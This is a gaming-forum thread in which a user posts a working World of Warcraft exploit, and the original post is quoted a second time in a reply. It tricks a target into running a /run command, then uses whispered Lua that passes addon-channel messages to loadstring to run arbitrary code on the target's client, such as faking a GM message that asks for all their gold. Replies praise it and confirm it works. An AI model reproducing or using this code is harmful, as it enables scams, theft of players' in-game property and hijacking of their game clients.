Run arbitrary LUA scripts on another WoW client.

[Hazzbazzy]

Hi all,

As the title states, this is an extremely malicious way to interact with another user; using this, you can make a target trade all their gold away, send mail, and basically perform any form of LUA function. The exploit is caused by an "oversight" at Blizzard, and it does not require any add-ons. Three bits of code are effectively required in order to run arbitrary code on a target's WoW, and the target is required to run one of these commands.

The first command:

Code:

/run RemoveExtraSpaces=RunScript

This is the command you have to get the target to run, it replaces the vanilla chat API of "RemoveExtraSpaces" (which is activated whenever you recieve a chat message), with the RunScript API (the API partly responsible for running LUA scripts).

The second "command":

Code:

z=z or  CreateFrame('button')z:RegisterEvent'CHAT_MSG_ADDON'z:SetScript('OnEvent',functi  on(_,_,_,m)pcall(loadstring(m))end)RegisterAddonMessagePrefix"Fr"

After the target has run the command, they will no longer be able to see chat messages, unless they are chat messages that you specifically create for them. This second bit of code is actually just whispered to the target (due to the "RemoveExtraSpaces="), and registers an Addon prefix so that you can send messages to the target across the "CHAT_MSG_ADDON" channel, which again, does not appear to the target.

The third (example) "command":

Code:

SendAddonMessage("Fr", RemoveExtraSpaces (ChatFrame1:AddMessage("\124cff00B4FF\124TInterface\\CHATFRAME\\UI-ChatIcon-Blizz.bmp:12:24:0:0\124t\124h[Latin]: Hi, please trade me all your gold\124r")), "WHISPER", "Reassurance-Rexxar")

This third piece of code is the "do this" part, and again whispered to the target. It works by sending a message to the target, which is then identified as if it's been written after the /run command, again due to the first command we had the target run. While it still appears as a message, whatever function you set in the message, the target will perform.

For example, the example I have provided sends a message to "Reassurance-Rexxar", and sends a command across the CHAT_MSG_ADDON channel to print a fake message on the targets screen, reading <GMICON>[Latin]: hi, please trade me all your gold. Obviously, the

Code:

ChatFrame1:AddMessage("\124cff00B4FF\124TInterface\\CHATFRAME\\UI-ChatIcon-Blizz.bmp:12:24:0:0\124t\124h[Latin]: Hi, please trade me all your gold\124r")

part can be changed to anything you want, such as having the target perform an emote, or say something random in guild chat.

\

Thanks all,

Edit: this appears to be partially, if not completely, fixed; I can no longer seem to send the second string of code to another player, as the message just does not send. Could be down to this:

[Kaizuken]

Hi all,

As the title states, this is an extremely malicious way to interact with another user, caused by an "oversight" at Blizzard, and it does not require any add-ons. Three bits of code are effectively required in order to run arbitrary code on a target's WoW, and the target is required to run one of these commands.

The first command:

Code:

/run RemoveExtraSpaces=RunScript

This is the command you have to get the target to run, it replaces the vanilla chat API of "RemoveExtraSpaces" (which is activated whenever you recieve a chat message), with the RunScript API (the API partly responsible for running LUA scripts).

The second "command":

Code:

z=z or  CreateFrame('button')z:RegisterEvent'CHAT_MSG_ADDON'z:SetScript('OnEvent',functi  on(_,_,_,m)pcall(loadstring(m))end)RegisterAddonMessagePrefix"Fr"

After the target has run the command, they will no longer be able to see chat messages, unless they are chat messages that you specifically create for them. This second bit of code is actually just whispered to the target (due to the "RemoveExtraSpaces="), and registers an Addon prefix so that you can send messages to the target across the "CHAT_MSG_ADDON" channel, which again, does not appear to the target.

The third (example) "command":

Code:

SendAddonMessage("Fr", RemoveExtraSpaces (ChatFrame1:AddMessage("\124cff00B4FF\124TInterface\\CHATFRAME\\UI-ChatIcon-Blizz.bmp:12:24:0:0\124t\124h[Latin]: Hi, please trade me all your gold\124r")), "WHISPER", "Reassurance-Rexxar")

This third piece of code is the "do this" part, and again whispered to the target. It works by sending a message to the target, which is then identified as if it's been written after the /run command, again due to the first command we had the target run. While it still appears as a message, whatever function you set in the message, the target will perform.

For example, the example I have provided sends a message to "Reassurance-Rexxar", and sends a command across the CHAT_MSG_ADDON channel to print a fake message on the targets screen, reading <GMICON>[Latin]: hi, please trade me all your gold. Obviously, the

Code:

ChatFrame1:AddMessage("\124cff00B4FF\124TInterface\\CHATFRAME\\UI-ChatIcon-Blizz.bmp:12:24:0:0\124t\124h[Latin]: Hi, please trade me all your gold\124r")

part can be changed to anything you want, such as having the target perform an emote, or say something random in guild chat.

\

Thanks all,

Haha, how you can discover things like that?
Nice found.
And how can you reach the Gm Island?

[Hazzbazzy]

Haha, how you can discover things like that?
Nice found.
And how can you reach the Gm Island?

Been at GM since WOTLK on my level 60, summoned my level 1 there with RAF for "reassurance"

I found this by investigating a scam that's going round and then working out how they were managing it.

[Alfalfa]

Nice find, +rep!

[krampak]

I got those "You have been disconnected from the chat server" messages yesterday. Does this mean that someone was trying to do such thing ?

[Hazzbazzy]

I got those "You have been disconnected from the chat server" messages yesterday. Does this mean that someone was trying to do such thing ?

No, I think it was Bizzard implementing a ninja hotfix for this.

[Android32]

wait, so we have a blizzard GM on the forums, who figures out exploits and posts them here?

[Aeon1c]

Epic find! +Rep

[Bitninja]

Thanks mate!

[Hanss]

Well done reverse engineering this hack. Interesting read!

[Hazzbazzy]

wait, so we have a blizzard GM on the forums, who figures out exploits and posts them here?

No, I'm not a GM

[solor]

I tried few days ago and replaced loadstring with print to get more info on exactly what "hacker" sends you, however it didnt work for some reason so i only ended up reporting him after playing dumb for ~10min and he was desperatly trying of teaching me how to run that /run command also at the end i explained him how exploit works since he seemed to be clueless. What i think is "someone" wrote whole addon for this and made a guide that is geting sold and now "script kiddies" are using it. Because its always same "back" story like someone would follow a guide. I saw him on at least 3 different EU servers same crap every time.

[Tubleros]

It works. When i tried it the first time nothing happened with the target. But when the other client disabled all the addons it worked just fine. So the target had some sort of addon activated that prevented the script to get through.

[Hazzbazzy]

It works. When i tried it the first time nothing happened with the target. But when the other client disabled all the addons it worked just fine. So the target had some sort of addon activated that prevented the script to get through.

Thanks for confirming, will look at attempting this again momentarily, perhaps was a temporary fix.

Edit: are you on US or EU realms, as I still can't get it to work on the EU side?

[Tubleros]

Thanks for confirming, will look at attempting this again momentarily, perhaps was a temporary fix.

Edit: are you on US or EU realms, as I still can't get it to work on the EU side?

I'm on the EU realms.